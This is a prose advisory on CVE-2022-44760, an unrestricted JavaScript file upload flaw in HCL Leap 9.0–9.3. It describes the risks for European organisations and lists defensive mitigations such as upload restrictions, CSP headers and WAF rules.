CVE-2022-44760 is a vulnerability identified in HCL Software's HCL Leap product, specifically affecting versions 9.0 through 9.3. The issue stems from an unsafe default file type filter policy that permits the unrestricted upload of files with dangerous types, notably JavaScript files. This vulnerability is categorized under CWE-434, which relates to the unrestricted upload of files with dangerous types. The core technical risk is that HCL Leap's file upload mechanism does not adequately restrict or sanitize file types, allowing attackers to upload malicious JavaScript code. Once uploaded, this malicious code can be executed within deployed applications, potentially leading to client-side code execution. This can facilitate various attack vectors such as cross-site scripting (XSS), unauthorized actions on behalf of users, or the injection of malicious payloads that compromise application integrity and user data confidentiality. The vulnerability does not require authentication or user interaction to exploit, as the unsafe file upload mechanism is a default behavior in the affected versions. Although no known exploits have been reported in the wild to date, the presence of this vulnerability in a widely used enterprise low-code development platform like HCL Leap raises significant concerns. The lack of patch links suggests that either a patch is pending or not publicly disclosed at the time of this report, increasing the urgency for organizations to apply mitigations or seek vendor guidance. The vulnerability was reserved in November 2022 and published in April 2025, indicating a prolonged disclosure timeline. The technical details enriched by CISA confirm the seriousness of the issue from a cybersecurity perspective.

For European organizations using HCL Leap versions 9.0 to 9.3, this vulnerability poses a medium-level risk that can lead to unauthorized execution of malicious JavaScript within their applications. This can compromise the confidentiality and integrity of sensitive business data, especially if the applications handle personal data or critical business processes. The exploitation could result in session hijacking, data leakage, or unauthorized actions performed under the guise of legitimate users. Additionally, the execution of malicious scripts could be leveraged to pivot attacks deeper into the enterprise network or to distribute malware. Given the increasing regulatory scrutiny in Europe around data protection (e.g., GDPR), any compromise involving personal data could lead to significant legal and financial repercussions. The availability impact is likely limited but could occur if malicious uploads disrupt application functionality or trigger denial-of-service conditions. The medium severity rating reflects the balance between the potential damage and the fact that exploitation requires the attacker to upload files, which may be restricted by organizational policies or additional controls. However, the default unsafe configuration increases the risk of accidental or targeted exploitation.

1. Immediate mitigation should involve restricting file upload types at the application and web server levels to explicitly allow only safe file formats. 2. Implement server-side validation and sanitization of all uploaded files to detect and block executable scripts or files containing embedded code. 3. Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts within the application context. 4. Monitor and audit file upload logs for suspicious activity, including uploads of unexpected file types or large volumes of uploads. 5. If possible, isolate file upload directories from the web root or configure them to prevent execution of uploaded files. 6. Engage with HCL Software support to obtain patches or updates addressing this vulnerability as soon as they become available. 7. Conduct security awareness training for developers and administrators on secure file handling practices. 8. Use web application firewalls (WAFs) with rules designed to detect and block malicious file uploads and script execution attempts. 9. Review and tighten user permissions related to file uploads to minimize exposure. These steps go beyond generic advice by focusing on layered defenses, proactive monitoring, and vendor engagement specific to the nature of this vulnerability.